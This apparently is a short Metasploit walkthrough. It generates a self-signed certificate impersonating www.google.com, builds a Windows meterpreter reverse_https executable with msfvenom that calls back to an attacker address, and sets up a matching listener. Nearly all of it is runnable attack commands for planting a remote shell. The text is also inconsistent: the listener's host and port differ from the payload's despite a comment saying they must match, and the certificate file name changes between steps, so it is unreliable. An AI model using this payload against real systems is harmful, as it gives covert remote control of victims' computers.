1. Generate the certificate

    # Self-signed RSA-4096 certificate valid for one year; the key is left unencrypted (-nodes)
    openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
    -subj /C=UK/ST=London/L=London/O=Development/CN=www.google.com \
    -keyout www.google.com.key \
    -out www.google.com.crt && \
    # Bundle key and certificate into one PEM file (the original was missing the redirect);
    # steps 2 and 3 below refer to this file as server.pem
    cat www.google.com.key www.google.com.crt > www.google.com.pem && \
    rm -f www.google.com.key www.google.com.crt
  2. Generate the payload

    msfvenom -p windows/meterpreter/reverse_https lhost=192.168.199.156 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=server.pem PayloadUUIDName=qqy -f exe -o payload.exe

    With PayloadUUIDTracking enabled, the generated payload carries a UUID when it connects back.

  3. Set up the listener

    use exploit/multi/handler
    # Must match the payload generated in step 2 (the original said reverse_tcp, which would not
    # accept the HTTPS payload and ignores the SSL certificate options)
    set payload windows/meterpreter/reverse_https
    # lhost/lport must match the values given to msfvenom in step 2
    set lhost 10.6.18.56
    set lport 4321
    # The PEM bundle generated in step 1
    set handlersslcert /root/kalifile/server.pem
    # Lets the handler tell a real shell connecting back apart from an nmap probe
    set stagerverifysslcert true
    run -j